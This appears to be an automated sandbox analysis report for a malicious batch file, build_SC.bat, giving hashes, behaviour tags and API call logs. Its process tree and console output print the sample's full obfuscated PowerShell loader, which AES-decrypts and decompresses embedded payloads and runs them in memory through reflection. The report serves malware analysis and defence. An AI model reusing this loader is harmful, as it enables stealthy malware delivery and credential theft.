Summary | ZeroBOX

build_SC.bat

Downloader FTP Code injection DGA HTTP PWS ScreenShot Create Service KeyLogger P2P Internet API Sniff Audio DNS Escalate privileges Http API Anti_VM Steal credential Socket AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6402 June 21, 2023, 7:45 a.m. June 21, 2023, 7:48 a.m.
Size 3.9MB
Type DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5 6cfcd7cf6081cb3dddc3b942446d9e43
SHA256 5259f147e8dee58a3e88aa1edf3521ab687bb28d52c1087c97b8a979d9d3c2c8
CRC32 9D63D660
ssdeep 49152:mA7srW+3kru5lgZDFlrcmLVEXKTiYz3M/QtuYKv+utgy0gh0HVTl8:y
Yara
  • anti_vm_detect - Possibly employs anti-virtualization techniques

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "EWhuIXEf" C:\Users\test22\AppData\Local\Temp\build_SC.bat

    3016
    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\build_SC.bat

      964
      • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\build_SC.bat

        2252
        • build_SC.bat.exe "C:\Users\test22\AppData\Local\Temp\build_SC.bat.exe" -w hidden -c $VWrg='Sptxljlitxljttxlj'.Replace('txlj', '');$poxH='Loadtxlj'.Replace('txlj', '');$PSUs='EntrtxljyPtxljointxljttxlj'.Replace('txlj', '');$JWKh='GettxljCutxljrretxljntPtxljrtxljocetxljsstxlj'.Replace('txlj', '');$uMOp='ChtxljangetxljExttxljenstxljiotxljntxlj'.Replace('txlj', '');$ngbA='EletxljmtxljenttxljAtxljttxlj'.Replace('txlj', '');$Idpk='MaitxljnMtxljotxljdutxljletxlj'.Replace('txlj', '');$HZsE='TrtxljantxljsftxljormtxljFitxljnaltxljBlotxljcktxlj'.Replace('txlj', '');$qaJF='FromtxljBtxljatxljsetxlj64txljStxljtrintxljgtxlj'.Replace('txlj', '');$WYHj='CtxljreatxljteDtxljecrtxljyptotxljrtxlj'.Replace('txlj', '');$Yxzl='RetxljadtxljLinetxljstxlj'.Replace('txlj', '');$XZtr='Intxljvotxljktxljetxlj'.Replace('txlj', '');function JeoHt($ELZLV){$PsSBT=[System.Security.Cryptography.Aes]::Create();$PsSBT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PsSBT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PsSBT.Key=[System.Convert]::$qaJF('ysmJpAaiNCwHWX8owtLbwDXbvqF4qqJv/N6iULJxQX4=');$PsSBT.IV=[System.Convert]::$qaJF('KkVvrh415rYbWSxbwOYxSw==');$vXLcw=$PsSBT.$WYHj();$XqKlx=$vXLcw.$HZsE($ELZLV,0,$ELZLV.Length);$vXLcw.Dispose();$PsSBT.Dispose();$XqKlx;}function vIJeV($ELZLV){$fXyGt=New-Object System.IO.MemoryStream(,$ELZLV);$vwbHF=New-Object System.IO.MemoryStream;$QVgMh=New-Object System.IO.Compression.GZipStream($fXyGt,[IO.Compression.CompressionMode]::Decompress);$QVgMh.CopyTo($vwbHF);$QVgMh.Dispose();$fXyGt.Dispose();$vwbHF.Dispose();$vwbHF.ToArray();}$BZAmP=[System.Linq.Enumerable]::$ngbA([System.IO.File]::$Yxzl([System.IO.Path]::$uMOp([System.Diagnostics.Process]::$JWKh().$Idpk.FileName, $null)), 1);$hOQTZ=$BZAmP.Substring(2).$VWrg(':');$OGRUZ=vIJeV (JeoHt ([Convert]::$qaJF($hOQTZ[0])));$aLVEO=vIJeV (JeoHt 
([Convert]::$qaJF($hOQTZ[1])));[System.Reflection.Assembly]::$poxH([byte[]]$aLVEO).$PSUs.$XZtr($null,$null);[System.Reflection.Assembly]::$poxH([byte[]]$OGRUZ).$PSUs.$XZtr($null,$null);

          2412

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Unexpected token '(' in expression or statement.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: At line:1 char:962
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: + $VWrg='Sptxljlitxljttxlj'.Replace('txlj', '');$poxH='Loadtxlj'.Replace('txlj'
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: , '');$PSUs='EntrtxljyPtxljointxljttxlj'.Replace('txlj', '');$JWKh='GettxljCutx
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: ljrretxljntPtxljrtxljocetxljsstxlj'.Replace('txlj', '');$uMOp='ChtxljangetxljEx
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: ttxljenstxljiotxljntxlj'.Replace('txlj', '');$ngbA='EletxljmtxljenttxljAtxljttx
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: lj'.Replace('txlj', '');$Idpk='MaitxljnMtxljotxljdutxljletxlj'.Replace('txlj',
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: '');$HZsE='TrtxljantxljsftxljormtxljFitxljnaltxljBlotxljcktxlj'.Replace('txlj',
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: '');$qaJF='FromtxljBtxljatxljsetxlj64txljStxljtrintxljgtxlj'.Replace('txlj', '
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: ');$WYHj='CtxljreatxljteDtxljecrtxljyptotxljrtxlj'.Replace('txlj', '');$Yxzl='R
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: etxljadtxljLinetxljstxlj'.Replace('txlj', '');$XZtr='Intxljvotxljktxljetxlj'.Re
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: place('txlj', '');function JeoHt($ELZLV){$PsSBT=[System.Security.Cryptography.A
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: es]::Create();$PsSBT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PsSBT
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: .Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PsSBT.Key=[System.C
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: onvert]::$qaJF( <<<< 'ysmJpAaiNCwHWX8owtLbwDXbvqF4qqJv/N6iULJxQX4=');$PsSBT.IV=
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: [System.Convert]::$qaJF('KkVvrh415rYbWSxbwOYxSw==');$vXLcw=$PsSBT.$WYHj();$XqKl
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: x=$vXLcw.$HZsE($ELZLV,0,$ELZLV.Length);$vXLcw.Dispose();$PsSBT.Dispose();$XqKlx
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: ;}function vIJeV($ELZLV){$fXyGt=New-Object System.IO.MemoryStream(,$ELZLV);$vwb
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: HF=New-Object System.IO.MemoryStream;$QVgMh=New-Object System.IO.Compression.GZ
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: ipStream($fXyGt,[IO.Compression.CompressionMode]::Decompress);$QVgMh.CopyTo($vw
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: bHF);$QVgMh.Dispose();$fXyGt.Dispose();$vwbHF.Dispose();$vwbHF.ToArray();}$BZAm
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: P=[System.Linq.Enumerable]::$ngbA([System.IO.File]::$Yxzl([System.IO.Path]::$uM
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: Op([System.Diagnostics.Process]::$JWKh().$Idpk.FileName, $null)), 1);$hOQTZ=$BZ
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: AmP.Substring(2).$VWrg(':');$OGRUZ=vIJeV (JeoHt ([Convert]::$qaJF($hOQTZ[0])));
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: $aLVEO=vIJeV (JeoHt ([Convert]::$qaJF($hOQTZ[1])));[System.Reflection.Assembly]
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: ::$poxH([byte[]]$aLVEO).$PSUs.$XZtr($null,$null);[System.Reflection.Assembly]::
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: $poxH([byte[]]$OGRUZ).$PSUs.$XZtr($null,$null);
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: ecordException
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : UnexpectedToken
console_handle: 0x0000017f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00397d70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00398270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00398270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00398270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003978f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003978f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003978f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003978f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003978f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003978f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00398070
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00398070
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00398070
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003979f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003982f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003982f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003982f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003982f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003982f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003982f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02690000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2412
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73aa1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0225a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2412
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73aa2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02252000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02262000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0228a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02263000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02264000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0229b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02297000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0225b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02282000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02295000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02265000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0228c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02266000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0229c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02283000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02284000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02285000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02286000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02287000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02288000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02289000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f25000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f26000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f27000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f28000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f29000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f2a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f2b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f2c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f2d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f2e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f2f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f31000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f32000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 4096
